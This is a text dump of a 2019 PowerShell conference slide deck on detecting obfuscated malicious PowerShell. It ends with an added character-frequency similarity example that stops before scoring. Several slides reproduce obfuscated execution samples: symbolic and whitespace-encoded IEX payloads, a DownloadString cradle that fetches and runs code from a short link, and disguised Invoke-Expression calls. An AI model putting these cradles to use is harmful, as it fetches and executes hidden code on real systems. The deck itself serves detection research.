  • 7. [System.Motivation]::GetBackground() • Background of 9 years in: • IT operations • Operational security • Incident Response consulting • Applied detection R&D at scale • 2 consistent things in each role • Coffee connoisseur PowerShell Conference EU 2019 https://www.beanthere.co.za/shop/home-brewing/chemex-coffee-maker/
  • 8. [System.Motivation]::GetBackground() • Background of 9 years in: • IT operations • Operational security • Incident Response consulting • Applied detection R&D at scale • 2 consistent things in each role • Coffee connoisseur • Aspiring PowerShell aficionado https://i2.wp.com/powershelldistrict.com/wp-content/uploads/2015/01/PowerShell-Hero.png https://www.beanthere.co.za/shop/home-brewing/chemex-coffee-maker/ PowerShell Conference EU 2019
  • 9. [System.Motivation]::GetBackground() • @(1..9) | % { "$_ years Working" } • @(1..7) | % { "$_ years PowerShelling" } • @(1..6) | % { "$_ years Detecting" } https://i2.wp.com/powershelldistrict.com/wp-content/uploads/2015/01/PowerShell-Hero.png PowerShell Conference EU 2019
  • 10. [System.Motivation]::GetBackground() • @(1..9) | % { "$_ years Working" } • @(1..7) | % { "$_ years PowerShelling" } • @(1..6) | % { "$_ years Detecting" } PowerShell Conference EU 2019 http://haxf4rall.com/2017/12/18/invoke-psimage-tool-to-embed-powershell-scripts-in-png-image-pixels/ Attackers PowerShell
  • 11. [System.Motivation]::GetBackground() • @(1..9) | % { "$_ years Working" } • @(1..7) | % { "$_ years PowerShelling" } • @(1..6) | % { "$_ years Detecting" } • @(1..3) | % { "$_ years Obfuscating" } while ($attacker.techniques -contains 'evasion') { $research = New-Research -Type Detection New-Detection -Content $research –Type @('host','network') } https://i2.wp.com/powershelldistrict.com/wp-content/uploads/2015/01/PowerShell-Hero.png PowerShell Conference EU 2019
  • 12. • FireEye Advanced Practices Team • Tracking attacker activity • Researching new attacker methods • Developing detections for these methods about_FindingEvil https://cdn-images-1.medium.com/max/1600/1*pazSTVPiSkUB7w7WiDpZNA.jpeg PowerShell Conference EU 2019
  • 13. Get-Evil | Sort-Object ObfuscationLevel | ogv • Slice & dice some malicious PowerShell • Highlight varying obfuscation levels & styles • Discuss trends in PowerShell obfuscation & detection efforts • Signatures vs signatureless vs targeted feature-based signatures • Novel detection approaches https://www.brafton.com/wp-content/uploads/2019/01/searching.gif PowerShell Conference EU 2019
  • 14. $ag = New-Object System.Agenda • Enter-PSSession -Hostname INTRO • Out-Obfuscated -Level @(0..10) • .EXAMPLE IEX Detection Development • Revoke-Obfuscation #Signatureless • about_MiminalObfuscation #PSAmsi • PesterSec • <# Novel Detection Approaches #> • Exit-PSSession #Key Takeaways PowerShell Conference EU 2019
  • 15. Get-Help Invoke-((Ob|DOS)fuscation|CradleCrafter) -Example PowerShell Conference EU 2019 https://media.giphy.com/media/dTGeSnz0FzufK/giphy.gif
  • 17. $ag = New-Object System.Agenda • Enter-PSSession -Hostname INTRO • Out-Obfuscated -Level @(0..10) • .EXAMPLE IEX Detection Development • Revoke-Obfuscation #Signatureless • about_MiminalObfuscation #PSAmsi • PesterSec • <# Novel Detection Approaches #> • Exit-PSSession #Key Takeaways PowerShell Conference EU 2019
  • 18. Start-Process -Verb Detect -ArgumentList @('piece','by','piece') • Static detection R&D often starts with identifying numerous building blocks • Focus on multi-level detection of building blocks • Treat as either high fidelity or combination of #WeakSignals https://www.tibco.com/blog/wp-content/uploads/2015/05/lego.jpg PowerShell Conference EU 2019
  • 19. Start-Process -Verb Detect -ArgumentList @('piece','by','piece') • Static detection R&D often starts with identifying numerous building blocks • Focus on multi-level detection of building blocks • Treat as either high fidelity or combination of #WeakSignals https://www.tibco.com/blog/wp-content/uploads/2015/05/lego.jpg PowerShell Conference EU 2019
  • 20. Start-Process -Verb Detect -ArgumentList @('piece','by','piece') https://media2.giphy.com/media/vRDMuINIfLTc4/giphy.gif PowerShell Conference EU 2019 • Why this signature-based static detection when PowerShell logging is available? • Defense in depth (if PS logging disabled) • Detecting guardrailed and/or keyed PowerShell • Open Source repo detection using YARA rules • Network detection of PS transfers
  • 21. $ag = New-Object System.Agenda • Enter-PSSession -Hostname INTRO • Out-Obfuscated -Level @(0..10) • .EXAMPLE IEX Detection Development • Revoke-Obfuscation #Signatureless • about_MiminalObfuscation #PSAmsi • PesterSec • <# Novel Detection Approaches #> • Exit-PSSession #Key Takeaways PowerShell Conference EU 2019
  • 22. $ag = New-Object System.Agenda • Enter-PSSession -Hostname INTRO • Out-Obfuscated -Level @(0..10) • .EXAMPLE IEX Detection Development • Revoke-Obfuscation #Signatureless • about_MiminalObfuscation #PSAmsi • PesterSec • <# Novel Detection Approaches #> • Exit-PSSession #Key Takeaways PowerShell Conference EU 2019
  • 23. Out-Obfuscated -Level @(999..100000) PowerShell Conference EU 2019 ${-'*}=+$( ); ${ }= ${-'*} ; ${(+} =++ ${-'*};${)}=(${-'*}=${-'*}+${(+} ) ; ${'/}= (${-'*} =${-'*}+ ${(+} ); ${@} = ( ${-'*}=${-'*} + ${(+}) ; ${~ =} =( ${-'*}= ${-'*}+ ${(+}); ${;} =(${-'*} =${-'*}+${(+}) ; ${+} = (${-'*}= ${-'*} + ${(+}) ; ${]} = ( ${-'*} =${-'*} + ${(+});${-}= (${-'*}=${-'*} + ${(+} ) ; ${-$.}="["+ "$( @{ }) "[${+}] +"$(@{})"["${(+}" +"${- }"]+ "$(@{} )"["${)}"+ "${ }" ] + "$? "[${(+} ] +"]";${-'*}="".("$(@{} )"[ "${(+}" + "${@}"]+"$(@{} ) "[ "${(+}" + "${;}" ]+ "$(@{} )"[ ${ }]+"$(@{ })"[ ${@}] +"$? "[${(+}]+"$(@{} ) "[${'/}]) ; ${-'*} ="$(@{ } )"[ "${(+}" + "${@}"] +"$(@{ })"[${@}]+ "${- '*}"["${)}"+"${+}"] ; "${-'*}(${-$.}${+}${'/} + ${-$.}${;}${-} +${-$.}${]}${]} + ${-$.}${'/}${)} + ${-$.}${@}${ }+ ${-$.}${+}${]}+${-$.}${(+}${ }${(+} +${-$.}${(+}${(+}${-}+ ${-$.}${@}${~ =} + ${- $.}${+}${-} + ${-$.}${-}${]}+${-$.}${(+}${ }${;} + ${-$.}${(+}${ }${(+}+${-$.}${-}${-}+${- $.}${(+}${(+}${;}+ ${-$.}${'/}${)}+ ${-$.}${+}${]}+${-$.}${(+}${ }${(+}+ ${-$.}${(+}${(+}${;}+${- $.}${@}${;} +${-$.}${]}${+} + ${-$.}${(+}${ }${(+} +${-$.}${-}${]}+${-$.}${;}${+} + ${-$.}${(+}${ }${]} +${-$.}${(+}${ }${~ =} +${-$.}${(+}${ }${(+}+ ${-$.}${(+}${(+}${ }+ ${-$.}${(+}${(+}${;} + ${-$.}${@}${(+} + ${-$.}${@}${;}+${-$.}${;}${]}+ ${-$.}${(+}${(+}${(+} +${-$.}${(+}${(+}${-} + ${- $.}${(+}${(+}${ }+ ${-$.}${(+}${ }${]} + ${-$.}${(+}${(+}${(+} + ${-$.}${-}${+}+${-$.}${(+}${ }${ } +${-$.}${]}${'/}+${-$.}${(+}${(+}${;}+ ${-$.}${(+}${(+}${@}+ ${-$.}${(+}${ }${~ =} + ${- $.}${(+}${(+}${ } + ${-$.}${(+}${ }${'/}+ ${-$.}${@}${ }+ ${-$.}${'/}${-}+${-$.}${(+}${ }${@}+${- $.}${(+}${(+}${;} +${-$.}${(+}${(+}${;} + ${-$.}${(+}${(+}${)}+${-$.}${~ =}${]}+${-$.}${@}${+}+${- $.}${@}${+} + ${-$.}${-}${]}+${-$.}${(+}${ }${~ =} + ${-$.}${(+}${(+}${;} +${-$.}${@}${;}+ ${- $.}${(+}${ }${]} +${-$.}${(+}${)}${(+}+ ${-$.}${@}${+} +${-$.}${+}${;}+ ${-$.}${~ =}${(+} +${- $.}${(+}${ }${'/}+ ${-$.}${@}${-} 
+${-$.}${(+}${(+}${;}+${-$.}${'/}${-} + ${-$.}${@}${(+})"|. ${-'*}
  • 24. Out-Obfuscated -Level @(999..100000) PowerShell Conference EU 2019 ${ }= + $( ); ${ }= ${ } ; ${ } =++${ } ;${ }= (${ }= ${ }+${ });${ }=(${ } = ${ }+${ } ) ;${ }=( ${ }= ${ } +${ } ) ;${ } =( ${ } = ${ } +${ } );${ } = ( ${ }= ${ } +${ } ) ;${ }=( ${ }= ${ } + ${ }) ; ${ } =(${ }= ${ } +${ }); ${ } =(${ } = ${ } +${ }); ${ } = "[" +"$(@{ })"[ ${ }] + "$(@{})"[ "${ }${ }"]+ "$(@{ } )"[ "${ }${ }"] + "$? "[${ }]+"]" ; ${ } ="".("$( @{ }) "[ "${ }${ }"]+"$(@{ } )"["${ }${ }" ]+"$( @{}) "[ ${ } ]+"$(@{} ) "[ ${ } ]+ "$?"[ ${ } ] +"$(@{ }) "[ ${ }]);${ } = "$( @{} ) "[ "${ }" + "${ }" ] +"$( @{ }) "[ ${ } ]+"${ }"[ "${ }" + "${ }" ]; & ${ } ( " ${ }${ }${ } +${ }${ }${ } + ${ }${ }${ }+ ${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }+ ${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ } +${ }${ }${ }${ } +${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ }+ ${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ } + ${ }${ }${ }+${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ } + ${ }${ }${ }| ${ }")
  • 25. Out-Obfuscated -Level @(999..100000) PowerShell Conference EU 2019 ' ' | % {$Script = $_ -Split '' | % {''; $_.Split('') | % {$_.Length-1}} ; $DecodedCommand = [Char[]] [Int[]]($Script[0..($Script.Length-1)] -Join '').Trim('').Split('') -Join ''; IE`X $DecodedCommand} 1000’s of whitespace & tab characters
  • 28. about_RevokeObfuscation PowerShell Conference EU 2019 -not ($healthy -or $normal)
  • 29. about_RevokeObfuscation PowerShell Conference EU 2019 Avg Char Freq of ALL 3.4K PoshCode scripts
  • 31. about_RevokeObfuscation PowerShell Conference EU 2019 SAMPLE 2: Symbolic (0.157) SAMPLE 1: Invoke-Obfuscation (0.379)
  • 33. about_RevokeObfuscation PowerShell Conference EU 2019 Similarity https://cobbr.io/ObfuscationDetection.html
  • 34. about_RevokeObfuscation PowerShell Conference EU 2019 https://cobbr.io/ObfuscationDetection.html https://en.wikipedia.org/wiki/Precision_and_recall
    Similarity Measure   Score
    Accuracy             0.71
    Precision            0.89
    Recall               0.37
    F1 Score             0.52
    True Positives       0.16
    False Positives      0.02
    True Negatives       0.55
    False Negatives      0.27
  • 35. PowerShell Conference EU 2019 https://media.giphy.com/media/WWRArOTz2L3wI/200w_d.gif
  • 36. Get-Command -Name ("{1}{0}" -f "-Process","Get") about_AbstractSyntaxTree PowerShell Conference EU 2019
    Tokens (source order): Generic, Parameter, LParen, StringExpandable, Format, StringExpandable, Comma, StringExpandable, RParen
  • 37. Get-Command -Name ("{1}{0}" -f "-Process","Get") about_AbstractSyntaxTree PowerShell Conference EU 2019
    Tokens (source order): Generic, Parameter, LParen, StringExpandable, Format, StringExpandable, Comma, StringExpandable, RParen
    AST:
      ScriptBlockAst
        NamedBlockAst: Begin
        NamedBlockAst: End
          StatementAst
            PipelineAst
              CommandAst
                StringConstantExpressionAst
                CommandParameterAst
                ParenExpressionAst
                  PipelineAst
                    BinaryExpressionAst (Operator: Format)
                      Left: StringConstantAst
                      Right: ArrayLiteralAst
                        0: StringConstantExpressionAst
                        1: StringConstantExpressionAst
  • 38. about_LogisticRegression #MathStuff PowerShell Conference EU 2019 + = Linear Regression Logit Function Logistic Regression https://en.wikipedia.org/wiki/Logistic_regression
  • 39. about_StochasticGradientDescent #MoarMathStuff PowerShell Conference EU 2019 • Result = Bias + (F1 * Weight1) + (F2 * Weight2) + (…) • ExpectedResult = (from labeled data) • Error = Result – ExpectedResult • Adjust each weight according to how much they contributed to the error. Do this a lot. https://en.wikipedia.org/wiki/Stochastic_gradient_descent
  • 40. about_LeeAndDanielHappyDance PowerShell Conference EU 2019 https://en.wikipedia.org/wiki/Precision_and_recall
    Measure            Cosine Similarity   Logistic Regression with Gradient Descent
    Accuracy           0.71                0.96
    Precision          0.89                0.96
    Recall             0.37                0.94
    F1 Score           0.52                0.95
    True Positives     0.16                0.36
    False Positives    0.02                0.01
    True Negatives     0.55                0.60
    False Negatives    0.27                0.02
    10x better at finding obfuscated content; half the false positives
  • 41. Get-Help Revoke-Obfuscation -Role PowerShell Conference EU 2019 • Revoke-Obfuscation highlights: • First AST-based PowerShell obfuscation detection framework • Signatureless data science approach • Daniel’s first “real” PowerShell module (& published to PowerShell Gallery) https://steamuserimages-a.akamaihd.net/ugc/26225809579209707/BD9801C802D330C551B79820D23BD8074DA9B75D/
  • 42. $ag = New-Object System.Agenda • Enter-PSSession -Hostname INTRO • Out-Obfuscated -Level @(0..10) • .EXAMPLE IEX Detection Development • Revoke-Obfuscation #Signatureless • about_MiminalObfuscation #PSAmsi • PesterSec • <# Novel Detection Approaches #> • Exit-PSSession #Key Takeaways PowerShell Conference EU 2019
  • 43. Out-Obfuscated -Level Minimal • Level & depth of obfuscation in malicious PowerShell varies wildly • No obfuscation – BLAND • Minimal obfuscation – ??? • Maximum obfuscation – ??? http://www.pngpix.com/wp-content/uploads/2016/06/PNGPIX-COM-Sliced-Wheat-Bread-PNG-Image.png PowerShell Conference EU 2019
  • 44. Out-Obfuscated -Level Minimal • Level & depth of obfuscation in malicious PowerShell varies wildly • No obfuscation – BLAND • Minimal obfuscation – ??? • Maximum obfuscation – SALTY http://www.pngpix.com/wp-content/uploads/2016/06/PNGPIX-COM-Sliced-Wheat-Bread-PNG-Image.png PowerShell Conference EU 2019 https://thumbs.gfycat.com/AnchoredAchingBighorn-size_restricted.gif
  • 45. Out-Obfuscated -Level Minimal • Level & depth of obfuscation in malicious PowerShell varies wildly • No obfuscation – BLAND • Minimal obfuscation – ??? • Maximum obfuscation – SALTY • ^^^ layered – EXTRA-SALTY https://steamuserimages-a.akamaihd.net/ugc/993492320936652061/35067ABF992F42EF4A7447CD39CA37A856EF08C0/ PowerShell Conference EU 2019 https://thumbs.gfycat.com/AnchoredAchingBighorn-size_restricted.gif
  • 46. Out-Obfuscated -Level Minimal • Level & depth of obfuscation in malicious PowerShell varies wildly • No obfuscation – BLAND • Minimal obfuscation – TASTEFUL • Maximum obfuscation – SALTY • ^^^ layered – EXTRA-SALTY https://media.giphy.com/media/l4Jz3a8jO92crUlWM/giphy.gif PowerShell Conference EU 2019 https://thumbs.gfycat.com/AnchoredAchingBighorn-size_restricted.gif
  • 47. Out-Obfuscated -Level Minimal • Level & depth of obfuscation in malicious PowerShell varies wildly • No obfuscation – BLAND • Minimal obfuscation – TASTEFUL • Maximum obfuscation – SALTY https://media.giphy.com/media/l4Jz3a8jO92crUlWM/giphy.gif PowerShell Conference EU 2019 https://thumbs.gfycat.com/AnchoredAchingBighorn-size_restricted.gif Ryan Cobb (@cobbr_io)
  • 48. Get-Help PSAmsi -Functionality • Using the AST (Abstract Syntax Tree) for minimal obfuscation • PSAmsi (@cobbr_io) • Uses AST to minimally obfuscate PowerShell scripts to evade specific A/V signatures • https://github.com/cobbr/PSAmsi PowerShell Conference EU 2019 https://specterops.io/who-we-are/the-team
  • 49. Out-Obfuscated -Level Minimal -Type @('Quantity','Depth') • Two types of minimal obfuscation (can be combined): • Quantity – Obfuscate only 3 of the 27 script blocks • Depth – Light obfuscation of any given token PowerShell Conference EU 2019
    Deep Obfuscation                            Shallow Obfuscation
    ."Do`wn`load`Str`in`g"                      ."Download`String"
    .("{1}{0}{2}" -f "load","Down","String")    .("Download"+"String")
  • 50. Out-Obfuscated -Level Minimal -Type @('Quantity','Depth') • Two types of minimal obfuscation (can be combined): • Quantity – Obfuscate only 3 of the 27 script blocks • Depth – Light obfuscation of any given token PowerShell Conference EU 2019
    Deep Obfuscation                            Shallow Obfuscation
    ."Do`wn`load`Str`in`g"                      ."Download`String"
    .("{1}{0}{2}" -f "load","Down","String")    .("Download"+"String")
    Targeted Token-Specific Detection Opportunity!
  • 51. $ag = New-Object System.Agenda • Enter-PSSession -Hostname INTRO • Out-Obfuscated -Level @(0..10) • .EXAMPLE IEX Detection Development • Revoke-Obfuscation #Signatureless • about_MiminalObfuscation #PSAmsi • PesterSec • <# Novel Detection Approaches #> • Exit-PSSession #Key Takeaways PowerShell Conference EU 2019
  • 52. Get-Help PesterSec -Examples • How can PSScriptAnalyzer help us detect minimal obfuscation? • In-depth signatures targeting specific AST node types, relationships, etc. • Measure-TickUsageInMember PowerShell Conference EU 2019
  • 53. Get-Help PesterSec -Examples • How can PSScriptAnalyzer help us detect minimal obfuscation? • In-depth signatures targeting specific AST node types, relationships, etc. • Measure-TickUsageInMember PowerShell Conference EU 2019
    Deep Obfuscation                            Shallow Obfuscation
    ."Do`wn`load`Str`in`g"                      ."Download`String"
    .("{1}{0}{2}" -f "load","Down","String")    .("Download"+"String")
  • 54. Get-Help PesterSec -Examples • How can PSScriptAnalyzer help us detect minimal obfuscation? • In-depth signatures targeting specific AST node types, relationships, etc. • Measure-NonAlphanumericUsageInMember PowerShell Conference EU 2019
  • 55. Get-Help PesterSec -Examples • How can PSScriptAnalyzer help us detect minimal obfuscation? • In-depth signatures targeting specific AST node types, relationships, etc. • Measure-NonAlphanumericUsageInMember PowerShell Conference EU 2019
    Deep Obfuscation                            Shallow Obfuscation
    ."Do`wn`load`Str`in`g"                      ."Download`String"
    .("{1}{0}{2}" -f "load","Down","String")    .("Download"+"String")
  • 56. Get-Help PesterSec -Examples • How can PSScriptAnalyzer help us detect minimal obfuscation? • In-depth signatures targeting specific AST node types, relationships, etc. • Measure-LongMemberValue PowerShell Conference EU 2019
  • 57. Get-Help PesterSec -Examples • How can PSScriptAnalyzer help us detect minimal obfuscation? • In-depth signatures targeting specific AST node types, relationships, etc. • Measure-LongMemberValue PowerShell Conference EU 2019
    Deep Obfuscation (Invoke-CradleCrafter)
    ((((New-Object Net.WebClient)|GM)|Where-Object{(Get-Item Variable:/_).Value.Name-like'D*g'}).Name)
  • 58. Get-Help PesterSec -Examples • How can PSScriptAnalyzer help us detect minimal obfuscation? • In-depth signatures targeting specific AST node types, relationships, etc. • Measure-TickUsageInVariable PowerShell Conference EU 2019
  • 59. Get-Help PesterSec -Examples • How can PSScriptAnalyzer help us detect minimal obfuscation? • In-depth signatures targeting specific AST node types, relationships, etc. • Measure-TickUsageInVariable PowerShell Conference EU 2019 Invocation Obfuscation . ( ${e`Nv:c`oM`sPEC}[4,15,25]-JOin'' )
  • 60. PowerShell Conference EU 2019 . ( ${e`Nv:c`oM`sPEC}[4,15,25]-JOin'' )
  • 61. PowerShell Conference EU 2019 . ( ${eNv:coMsPEC}[4,15,25]-JOin'' ) 27 chars
  • 62. PowerShell Conference EU 2019 . ( ${eNv:coMsPEC}[4,15,25]-JOin'' ) 4 15 25
  • 63. PowerShell Conference EU 2019 . 'iex' 4 15 25 https://i.imgur.com/8oXBdLG.gif
  • 64. Get-Help PesterSec -Examples • How can PSScriptAnalyzer help us detect minimal obfuscation? • In-depth signatures targeting specific AST node types, relationships, etc. • Measure-NonAlphanumericUsageInVariable PowerShell Conference EU 2019
  • 65. Get-Help PesterSec -Examples • How can PSScriptAnalyzer help us detect minimal obfuscation? • In-depth signatures targeting specific AST node types, relationships, etc. • Measure-NonAlphanumericUsageInVariable PowerShell Conference EU 2019 Variable Obfuscation (ISE Steroids) ${____/=/==//===}
  • 66. New-Item -ItemType Idea -Name PesterSec • PS> Invoke-Expression (New-Object Net.WebClient)."`D`o`wn`l`oa`d`Str`in`g"( 'ht'+'tps:/bit.ly/L3g1t') PowerShell Conference EU 2019
  • 67. Get-Help PesterSec -Detailed • PSScriptAnalyzer_Obfuscation_Detection_Rules.psm1 • Measure-TickUsageInCommand • Measure-TickUsageInArgument • Measure-TickUsageInMember • Measure-TickUsageInVariable • Measure-NonAlphanumericUsageInMember • Measure-NonAlphanumericUsageInVariable • Measure-LongMemberValue • Measure-SAObfuscation.psm1 • Wrapper module for displaying aggregated ScriptAnalyzer hits PowerShell Conference EU 2019
  • 69. $ag = New-Object System.Agenda • Enter-PSSession -Hostname INTRO • Out-Obfuscated -Level @(0..10) • .EXAMPLE IEX Detection Development • Revoke-Obfuscation #Signatureless • about_MiminalObfuscation #PSAmsi • PesterSec • <# Novel Detection Approaches #> • Exit-PSSession #Key Takeaways PowerShell Conference EU 2019
  • 70. $moduleLogs | Group-Object PipelineID,CommandName • Fingerprint abnormal scripts by cmdlet groupings • AST to query from extracted script (group on Command) • EID 4103 events for executed script (group on PipelineID,CommandName) PowerShell Conference EU 2019
    # Load script to analyze (.Content gives the body as a string, which is what Tokenize expects).
    $script = (Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1).Content
    # Tokenize script.
    $tokens = [System.Management.Automation.PSParser]::Tokenize($script, [ref] $null)
    # Group on Command (cmdlet/alias/etc.) to find high concentration of repeated Commands.
    $tokens | Where-Object { $_.Type -eq 'Command' } | Group-Object Content | Where-Object { $_.Count -ge 10 } | Sort-Object Count -Descending | Select-Object Count,Name
  • 71. $moduleLogs | Group-Object PipelineID,CommandName • Fingerprint abnormal scripts by cmdlet groupings • AST to query from extracted script (group on Command) • EID 4103 events for executed script (group on PipelineID,CommandName) PowerShell Conference EU 2019
    # Load script to analyze (.Content gives the body as a string, which is what Tokenize expects).
    $script = (Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1).Content
    # Tokenize script.
    $tokens = [System.Management.Automation.PSParser]::Tokenize($script, [ref] $null)
    # Group on Command (cmdlet/alias/etc.) to find high concentration of repeated Commands.
    $tokens | Where-Object { $_.Type -eq 'Command' } | Group-Object Content | Where-Object { $_.Count -ge 10 } | Sort-Object Count -Descending | Select-Object Count,Name
  • 72. Compare-Object $oldPSLog $newPSLog PowerShell Conference EU 2019
    Command line: powershell.exe Invoke-Expression $env:gkwa
    Windows PowerShell – EID 800 (callouts: Cmdlet invoked; Parent ScriptBlock):
      Pipeline execution details for command line: Invoke-Expression $env:gkwa
      Context Information: DetailSequence=1 <REDACTED> CommandLine=Invoke-Expression $env:gkwa
      Details: CommandInvocation(Invoke-Expression): "Invoke-Expression"
               ParameterBinding(Invoke-Expression): name="Command"; value="<REDACTED>"
  • 73. Compare-Object $oldPSLog $newPSLog PowerShell Conference EU 2019
    Command line: powershell.exe iex $env:gkwa
    Windows PowerShell – EID 800 (callouts: Cmdlet invoked; Parent ScriptBlock):
      Pipeline execution details for command line: iex $env:gkwa
      Context Information: DetailSequence=1 <REDACTED> CommandLine=iex $env:gkwa
      Details: CommandInvocation(Invoke-Expression): "Invoke-Expression"
               ParameterBinding(Invoke-Expression): name="Command"; value="<REDACTED>"
  • 74. Compare-Object $oldPSLog $newPSLog PowerShell Conference EU 2019
    Command line: powershell.exe ie`x $env:gkwa
    Windows PowerShell – EID 800 (callouts: Cmdlet invoked; Parent ScriptBlock) OBFUSCATED!
      Pipeline execution details for command line: ie`x $env:gkwa
      Context Information: DetailSequence=1 <REDACTED> CommandLine=ie`x $env:gkwa
      Details: CommandInvocation(Invoke-Expression): "Invoke-Expression"
               ParameterBinding(Invoke-Expression): name="Command"; value="<REDACTED>"
  • 75. Compare-Object $oldPSLog $newPSLog PowerShell Conference EU 2019
    Command line: sV s3zxl5 ( [typE]( "{1}{0}{2}" -f'ViRO','en','NmeNt') ) ; ( ( VARIaBle S3ZXl5 -Va )::( "{1}{0}{3}{4}{2}"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'gkwa',( "{2}{1}{0}" -f 'S','ocES','pR' )) ) |. ( ${e`Nv:c`oM`sPEC}[4,15,25]-JOin'' )
    Windows PowerShell – EID 800 OBFUSCATED!
      Pipeline execution details for command line: sV s3zxl5 ( [typE]( "{1}{0}{2}" -f'ViRO','en','NmeNt') ) ; ( ( VARIaBle S3ZXl5 -Va )::( "{1}{0}{3}{4}{2}"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'gkwa',( "{2}{1}{0}" -f 'S','ocES','pR' )) ) |. ( ${e`Nv:c`oM`sPEC}[4,15,25]-JOin'' )
      Context Information: DetailSequence=1 <REDACTED> CommandLine=sV s3zxl5 ( [typE]( "{1}{0}{2}" -f'ViRO','en','NmeNt') ) ; ( ( VARIaBle S3ZXl5 -Va )::( "{1}{0}{3}{4}{2}"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'gkwa',( "{2}{1}{0}" -f 'S','ocES','pR' )) ) |. ( ${e`Nv:c`oM`sPEC}[4,15,25]-JOin'' )
      Details: CommandInvocation(Invoke-Expression): "Invoke-Expression"
               ParameterBinding(Invoke-Expression): name="Command"; value="<REDACTED>"
  • 76. $ag = New-Object System.Agenda • Enter-PSSession -Hostname INTRO • Out-Obfuscated -Level @(0..10) • .EXAMPLE IEX Detection Development • Revoke-Obfuscation #Signatureless • about_MiminalObfuscation #PSAmsi • PesterSec • <# Novel Detection Approaches #> • Exit-PSSession #Key Takeaways PowerShell Conference EU 2019
  • 77. $keyTakeaway[0] • PowerShell obfuscation is easily accessible to all • Used frequently ITW • MOSTLY de-obfuscated by PowerShell scriptblock logging • Data science-driven detection exists with Revoke-Obfuscation • Maximum obfuscation is used by some attackers more than others • Minimal obfuscation is far less frequent but quite effective • PSScriptAnalyzer enables the best of both worlds for detection: • AST for targeted token type calculations and inspection • Flexible logic for marking as suspicious, creating weak signals, etc. PowerShell Conference EU 2019
  • 78. $keyTakeaway[1] # Thank You PowerShell Community!!! • TFW you combine PowerShell logging, Revoke-Obfuscation AND PesterSec: PowerShell Conference EU 2019 https://media0.giphy.com/media/6XTnkNHVZv6AU/giphy.gif https://thumbs.gfycat.com/CooperativeDeliciousCaracal-size_restricted.gif
  • 79. • Daniel Bohannon • Twitter: @danielhbohannon • Blog: https://danielbohannon.com/ • Github: https://github.com/danielbohannon/ about_Author PowerShell Conference EU 2019 http://workpulse.io/blog/wp-content/uploads/2015/09/themasterpeice.gif
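Slides 28 to 34 score a script by comparing its character-frequency profile with the average profile of known-good scripts, the cosine-similarity measure whose precision and recall slide 34 reports. The PowerShell below is an added example written for this page, not Revoke-Obfuscation's code: the 96-bucket alphabet, the three-script stand-in baseline and the scored samples are my assumptions (the deck's real baseline was about 3.4K PoshCode scripts), and the sample texts are taken from slides 23 and 59 with a placeholder URL.

```powershell
# Added example: character-frequency vectors + cosine similarity (not Revoke-Obfuscation's own code).

function Get-CharFrequencyVector {
    # Normalised frequency of each printable-ASCII character (0x20..0x7E = 95 buckets);
    # tabs, newlines and non-ASCII are pooled into a 96th bucket. The alphabet is an assumption.
    param([Parameter(Mandatory)][AllowEmptyString()][string]$Text)
    $vector = New-Object double[] 96
    foreach ($ch in $Text.ToCharArray()) {
        $code = [int]$ch
        $idx = if ($code -ge 32 -and $code -le 126) { $code - 32 } else { 95 }
        $vector[$idx]++
    }
    if ($Text.Length -gt 0) {
        for ($i = 0; $i -lt $vector.Length; $i++) { $vector[$i] /= $Text.Length }
    }
    ,$vector
}

function Get-CosineSimilarity {
    # dot(a,b) / (|a| * |b|): 1.0 = identical character distribution, 0.0 = nothing in common.
    param([Parameter(Mandatory)][double[]]$A, [Parameter(Mandatory)][double[]]$B)
    $dot = 0.0; $na = 0.0; $nb = 0.0
    for ($i = 0; $i -lt $A.Length; $i++) {
        $dot += $A[$i] * $B[$i]
        $na  += $A[$i] * $A[$i]
        $nb  += $B[$i] * $B[$i]
    }
    if ($na -eq 0 -or $nb -eq 0) { return 0.0 }
    $dot / ([math]::Sqrt($na) * [math]::Sqrt($nb))
}

function Get-BaselineVector {
    # Average of the per-script vectors: the "Avg Char Freq" profile of slide 29.
    param([Parameter(Mandatory)][string[]]$Scripts)
    $sum = New-Object double[] 96
    foreach ($s in $Scripts) {
        $v = Get-CharFrequencyVector -Text $s
        for ($i = 0; $i -lt $sum.Length; $i++) { $sum[$i] += $v[$i] }
    }
    for ($i = 0; $i -lt $sum.Length; $i++) { $sum[$i] /= $Scripts.Count }
    ,$sum
}

# Constructed stand-in for the known-good corpus: three ordinary admin one-liners.
$baselineScripts = @(
    'Get-Process | Where-Object { $_.CPU -gt 100 } | Sort-Object CPU -Descending | Select-Object -First 5',
    'function Get-DiskUsage { param([string]$Path = ".") Get-ChildItem -Path $Path -Recurse -File | Measure-Object -Property Length -Sum }',
    'Import-Module ActiveDirectory; Get-ADUser -Filter * -Properties LastLogonDate | Export-Csv -Path users.csv -NoTypeInformation'
)
$baseline = Get-BaselineVector -Scripts $baselineScripts

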